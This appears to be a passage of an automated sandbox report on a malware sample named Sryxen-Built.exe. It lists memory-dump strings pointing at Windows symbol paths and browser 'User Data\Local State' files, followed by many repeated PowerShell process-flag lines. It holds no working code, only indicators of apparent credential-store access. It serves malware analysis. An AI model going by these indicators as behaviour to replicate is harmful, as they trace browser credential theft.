Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308113785.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ntkrnlmp.pdbrppDa source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State\*` source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\eh source: Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319851214.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local State*tet source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ntkrnlmp.pdb<AppCache133858168207041016.txt source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe\* source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ta\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*te/ source: Sryxen-Built.exe, 00000000.00000003.1319923806.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: d_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbO0# source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323702315.00000273000CB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2te** source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbtManagementSDK\Local Stateages\c5e252 source: Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ataState source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*{ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1311546341.00000273000FD000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtateanag source: Sryxen-Built.exe, 00000000.00000003.1303981152.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304546053.00000273000C7000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Data source: Sryxen-Built.exe, 00000000.00000003.1300184374.00000273000DF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiese\*f source: Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*2 source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pd source: Sryxen-Built.exe, 00000000.00000003.1303287287.00000273000D5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302905777.00000273000D3000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300485113.00000273000D5000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056E source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300116000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\y\* source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate\*e\*b source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17} source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 State source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbs.dat source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateon source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbte source: Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300106421.00000273000F6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ate source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2State source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State*te source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2s\*te source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2e\*eW6 source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\eState source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ngState\* source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb2658 source: Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statete\* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\enses\Local Stateatee6 source: Sryxen-Built.exe, 00000000.00000003.1297909339.0000027300107000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1297889178.0000027300101000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Sryxen-Built.exe, 00000000.00000003.1376501041.00000273002EA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002EB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376398317.00000273002E1000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376811787.00000273002F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local Statetate4 source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbs\tate&)` source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\***p source: Sryxen-Built.exe, 00000000.00000003.1303947102.0000027300108000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304159912.0000027300108000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*ew source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Uninstall-PerUser_2025-03-07_103157_8ac-16f4.log.pdbjon source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*a source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\*n* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325746295.00000273000DB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Datatatee source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*. source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbte source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831tetete source: Sryxen-Built.exe, 00000000.00000003.1325269713.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325153577.0000027300110000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: e7b466d5-50e5-406a-8ec7-bccc33cd9768.up_meta_body.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1308726433.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309593143.0000027300111000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\User Data\Local Stateeay source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
